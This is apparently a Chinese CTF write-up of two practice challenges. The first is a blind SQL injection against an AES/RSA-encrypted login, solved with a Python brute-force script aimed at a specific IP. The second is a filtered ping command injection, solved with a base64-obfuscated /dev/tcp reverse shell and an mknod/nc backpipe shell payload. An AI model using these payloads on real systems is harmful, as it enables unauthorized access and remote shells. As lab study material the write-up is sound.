练习题wp

访问: 33 次

前言

师傅出题,干!

js_encode_with_sql_injection

image.png

很清晰,前端对username、password经过aes的cbc模式加密,key通过rsa加密,一起发到后端,这个key是随机生成的16位字符串,印证题目需要sql注入,于是思路很清晰,通过自己固定死key,经过相同的cbc加密,然后sql注入,于是开启了采坑之旅。坑就是:python跟php实现cbc加密与js加密之后的结果不一样。下面给出python跟php对cbc加密的脚本,有空可以复现这个坑

<?php

class MagicCrypt {
    private $iv = "1234567890123456";//密钥偏移量IV,可自定义

    private $encryptKey = "Ca94HUh2kEA2Vwz7";//AESkey,可自定义

    //加密
    public function encrypt($encryptStr) {
        $localIV = $this->iv;
        $encryptKey = $this->encryptKey;

        //Open module
        $module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, $localIV);

        //print "module = $module <br/>" ;

        mcrypt_generic_init($module, $encryptKey, $localIV);

        //Padding
        $block = mcrypt_get_block_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
        $pad = $block - (strlen($encryptStr) % $block); //Compute how many characters need to pad
        $encryptStr .= str_repeat(chr($pad), $pad); // After pad, the str length must be equal to block or its integer multiples

        //encrypt
        $encrypted = mcrypt_generic($module, $encryptStr);

        //Close
        mcrypt_generic_deinit($module);
        mcrypt_module_close($module);

        return base64_encode($encrypted);

    }

    //解密
    public function decrypt($encryptStr) {
        $localIV = $this->iv;
        $encryptKey = $this->encryptKey;

        //Open module
        $module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, $localIV);

        //print "module = $module <br/>" ;

        mcrypt_generic_init($module, $encryptKey, $localIV);

        $encryptedData = base64_decode($encryptStr);
        $encryptedData = mdecrypt_generic($module, $encryptedData);

        return $encryptedData;
    }
}
$encryptString = 'asdasd';
$encryptObj = new MagicCrypt();

$result = $encryptObj->encrypt($encryptString);//加密结果
$decryptString = $decryptString = $encryptObj->decrypt($result);//解密结果
echo $result . "<br/>";
echo $decryptString . "<br/>";
?>
import base64
from Crypto.Cipher import AES

class AESCipher:

    def __init__(self, key):
        self.key = key[0:16] #只截取16位
        self.iv = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" # 16位字符,用来填充缺失内容,可固定值也可随机字符串,具体选择看需求。

    def __pad(self, text):
        """填充方式,加密内容必须为16字节的倍数,若不足则使用self.iv进行填充"""
        text_length = len(text)
        amount_to_pad = AES.block_size - (text_length % AES.block_size)
        if amount_to_pad == 0:
            amount_to_pad = AES.block_size
        pad = chr(amount_to_pad)
        return text + pad * amount_to_pad

    def __unpad(self, text):
        pad = ord(text[-1])
        return text[:-pad]

    def encrypt(self, raw):
        """加密"""
        raw = self.__pad(raw)
        cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
        return base64.b64encode(cipher.encrypt(raw)) 

    def decrypt(self, enc):
        """解密"""
        enc = base64.b64decode(enc)
        cipher = AES.new(self.key, AES.MODE_CBC, self.iv )
        return self.__unpad(cipher.decrypt(enc).decode("utf-8"))


if __name__ == '__main__': 
    e = AESCipher('xxxxxxx')     //加密需要的key
    secret_data = "xxxxxxxx "      //需要加密的数据
    enc_str = e.encrypt(secret_data)
    print('enc_str: ' + enc_str.decode())
    dec_str = e.decrypt(enc_str)
    print('dec str: ' + dec_str)

最后发现在线的加密和js的一样,于是用python去调用在线网页的加密然后再实现sql注入即可,上脚本

#!/usr/bin/python
# -*- coding:utf-8-*-
import base64
import requests
import re
from Crypto.Cipher import AES

list = "1234567890"
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],.'
def getmiwen(mingwen):
    iv = '1234567890123456'
    key = '2rT3TgEUapzyPQRv'
    plain=mingwen
    if(len(plain)%16!=0):
        plain+=(16-(len(plain)%16))*'\0'
    aes = AES.new(key,AES.MODE_CBC,iv)
    ss=aes.encrypt(plain).encode('base64')
    return ss

def zhuru(username):
    url="http://129.204.73.141:2000/login.php"
    headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'
    }
    data={
    'username':"",
    'password':"JfSE3en4ZlF3Q9T1aXSJKg==",
    'code':"1277a7060a98f9ac132b5974cdd5c4d494f304022b654ec90bf4d1c8fdbe23e96bba5cf33f2a116677d379f038a5dcb6114eb4ffb4db58d84bb57e6ad5f848074e4f00114f8d9ac5250572cbac1fa3b7d2db372a4a0f057c09adeb4b19089dbe29f73313c53e6a39f4fd0d845dd270069da874c1b6a43222667b961b8f098a5b"
    }
    data['username']=username.strip('\n')
    r=requests.post(url,headers=headers,data=data)
    return r.text
def guanjianzi():
    file = open("D:\CTF\字典\sql关键字fuzz.txt")
    for line in file:
        miwen=getmiwen(line)
        ttext=zhuru(miwen,miwen)
        if "wrong" in ttext:
            print(line)
def main():
    passwd=''
    for j in range(1,65):
        for i in list:
            sqlline="1'=(hex(password)regexp'^%s')='1"%(passwd+str(i))           
            miwen=getmiwen(sqlline)
            ttext=zhuru(miwen)
            if "wrong user" in ttext:
                passwd+=str(i)
                print(passwd)
                break


if __name__ == '__main__':
    main()

也可以选择了直接console跑
image.png
image.png
image.png

ping_to_rce

image.png

题目就一个输入框,扫描啥的扫了啥都没有,那就对着这里干,很明显,ping,那么肯定就是命令注入了,不管你输入啥,要么就是success、error、hacher,就这三个,经过fuzz,过滤了听过关键词的
image.png
命令注入没有回显,想要获得数据,就得想帮发把数据往外发。
先了解命令注入常用技巧:
命令注入骚操作

image.png

image.png


安排!
反弹shell: https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html
https://www.freebuf.com/articles/system/178150.html
https://xz.aliyun.com/t/2549
https://www.anquanke.com/post/id/87017
hhh,里面讲的全被过滤了,经过了很多操作,msf生成的python反弹shell也试了,本地都可以打,远程打不了,晕死,最后想到/tmp写一个sh脚本,然后执行
采坑:怎么写?

echo "WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1qQXVOemt1TXpFdU1UZzFMelEwTXlBd1BpWXhDZz09Cg=="|base64 -d|base64 -d >3.sh

这里可以探讨一下下为什么要二次编码
采坑:写了就可以执行了?
image.png
卡在这里,我都快放弃了,想想没可能啊,我权限啥的都改好了,不知道为啥就是执行不了,快要放弃之时,搜了一下执行sh脚本方法
https://blog.csdn.net/ljp812184246/article/details/52585650

image.png
采坑:这样还是不行?怎么解?考虑一下bash运行试试?bash又被过滤了,凉?
参考我最先发的命令注入骚操作那篇文章,其实我在采坑只是早就绕过了bash
image.png

最后上aye的payload

ip=|mknod%09/tmp/backpipe66%09p
ip=|/bin/sh%09</tmp/backpipe66%09|nc%09x.x.x.x.x%092333>/tmp/backpipe66
直接用sh代替bash

image.png
安排!

tag(s): CTF
show comments · back · home
署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。
Edit with markdown